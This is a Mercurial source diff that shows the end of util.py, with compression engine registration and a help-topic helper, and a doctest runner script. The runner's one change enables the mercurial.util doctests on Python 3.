3785 3787 except Exception as e:
3786 3788 raise error.RevlogError(_('revlog decompress error: %s') %
3787 3789 str(e))
3788 3790
3789 3791 def revlogcompressor(self, opts=None):
3790 3792 opts = opts or {}
3791 3793 return self.zstdrevlogcompressor(self._module,
3792 3794 level=opts.get('level', 3))
3793 3795
3794 3796 compengines.register(_zstdengine())
3795 3797
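# A hedged sketch: the zstd engine is optional, so callers should guard
# on available() before relying on it (payload illustrative):
#
#   eng = compengines['zstd']
#   if eng.available():
#       blob = ''.join(eng.compressstream(iter(['payload']), {'level': 3}))
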
3796 3798 def bundlecompressiontopics():
3797 3799 """Obtains a list of available bundle compressions for use in help."""
3798 3800 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3799 3801 items = {}
3800 3802
3801 3803 # We need to format the docstring. So use a dummy object/type to hold it
3802 3804 # rather than mutating the original.
3803 3805 class docobject(object):
3804 3806 pass
3805 3807
3806 3808 for name in compengines:
3807 3809 engine = compengines[name]
3808 3810
3809 3811 if not engine.available():
3810 3812 continue
3811 3813
3812 3814 bt = engine.bundletype()
3813 3815 if not bt or not bt[0]:
3814 3816 continue
3815 3817
3816 3818 doc = pycompat.sysstr('``%s``\n %s') % (
3817 3819 bt[0], engine.bundletype.__doc__)
3818 3820
3819 3821 value = docobject()
3820 3822 value.__doc__ = doc
3821 3823 value._origdoc = engine.bundletype.__doc__
3822 3824 value._origfunc = engine.bundletype
3823 3825
3824 3826 items[bt[0]] = value
3825 3827
3826 3828 return items
3827 3829
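# Hedged illustration: with the engines registered above, the returned
# dict maps names such as 'gzip', 'bzip2', 'none' and, when available,
# 'zstd' to objects whose __doc__ feeds the help system.
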
3828 3830 i18nfunctions = bundlecompressiontopics().values()
3829 3831
3830 3832 # convenient shortcut
3831 3833 dst = debugstacktrace
@@ -1,81 +1,81 b''
1 1 # this is a hack to make sure no escape characters are inserted into the output
2 2
3 3 from __future__ import absolute_import
4 4
5 5 import doctest
6 6 import os
7 7 import re
8 8 import sys
9 9
10 10 ispy3 = (sys.version_info[0] >= 3)
11 11
12 12 if 'TERM' in os.environ:
13 13 del os.environ['TERM']
14 14
15 15 class py3docchecker(doctest.OutputChecker):
16 16 def check_output(self, want, got, optionflags):
17 17 want2 = re.sub(r'''\bu(['"])(.*?)\1''', r'\1\2\1', want) # py2: u''
18 18 got2 = re.sub(r'''\bb(['"])(.*?)\1''', r'\1\2\1', got) # py3: b''
19 19 # py3: <exc.name>: b'<msg>' -> <name>: <msg>
20 20 # <exc.name>: <others> -> <name>: <others>
21 21 got2 = re.sub(r'''^mercurial\.\w+\.(\w+): (['"])(.*?)\2''', r'\1: \3',
22 22 got2, flags=re.MULTILINE)
23 23 got2 = re.sub(r'^mercurial\.\w+\.(\w+): ', r'\1: ', got2, flags=re.MULTILINE)
24 24 return any(doctest.OutputChecker.check_output(self, w, g, optionflags)
25 25 for w, g in [(want, got), (want2, got2)])
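# e.g. a py2 "want" of u'foo' normalizes to 'foo' and a py3 "got" of
# b'foo' normalizes to 'foo', so the two representations compare equal.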
26 26
27 27 # TODO: migrate doctests to py3 and enable them on both versions
28 28 def testmod(name, optionflags=0, testtarget=None, py2=True, py3=True):
29 29 if not ((not ispy3 and py2) or (ispy3 and py3)):
30 30 return
31 31 __import__(name)
32 32 mod = sys.modules[name]
33 33 if testtarget is not None:
34 34 mod = getattr(mod, testtarget)
35 35
36 36 # minimal copy of doctest.testmod()
37 37 finder = doctest.DocTestFinder()
38 38 checker = None
39 39 if ispy3:
40 40 checker = py3docchecker()
41 41 runner = doctest.DocTestRunner(checker=checker, optionflags=optionflags)
42 42 for test in finder.find(mod, name):
43 43 runner.run(test)
44 44 runner.summarize()
45 45
46 46 testmod('mercurial.changegroup')
47 47 testmod('mercurial.changelog')
48 48 testmod('mercurial.color')
49 49 testmod('mercurial.config')
50 50 testmod('mercurial.context')
51 51 testmod('mercurial.dagparser', optionflags=doctest.NORMALIZE_WHITESPACE)
52 52 testmod('mercurial.dispatch')
53 53 testmod('mercurial.encoding')
54 54 testmod('mercurial.formatter')
55 55 testmod('mercurial.hg')
56 56 testmod('mercurial.hgweb.hgwebdir_mod')
57 57 testmod('mercurial.match')
58 58 testmod('mercurial.mdiff')
59 59 testmod('mercurial.minirst')
60 60 testmod('mercurial.patch')
61 61 testmod('mercurial.pathutil')
62 62 testmod('mercurial.parser')
63 63 testmod('mercurial.pycompat')
64 64 testmod('mercurial.revsetlang')
65 65 testmod('mercurial.smartset')
66 66 testmod('mercurial.store')
67 67 testmod('mercurial.subrepo')
68 68 testmod('mercurial.templatefilters')
69 69 testmod('mercurial.templater')
70 70 testmod('mercurial.ui')
71 71 testmod('mercurial.url')
72 testmod('mercurial.util', py3=False) # py3: multiple bytes/unicode issues
72 testmod('mercurial.util')
73 73 testmod('mercurial.util', testtarget='platform')
74 74 testmod('hgext.convert.convcmd')
75 75 testmod('hgext.convert.cvsps')
76 76 testmod('hgext.convert.filemap')
77 77 testmod('hgext.convert.p4')
78 78 testmod('hgext.convert.subversion')
79 79 testmod('hgext.mq')
80 80 # Helper scripts in tests/ that have doctests:
81 81 testmod('drawdag')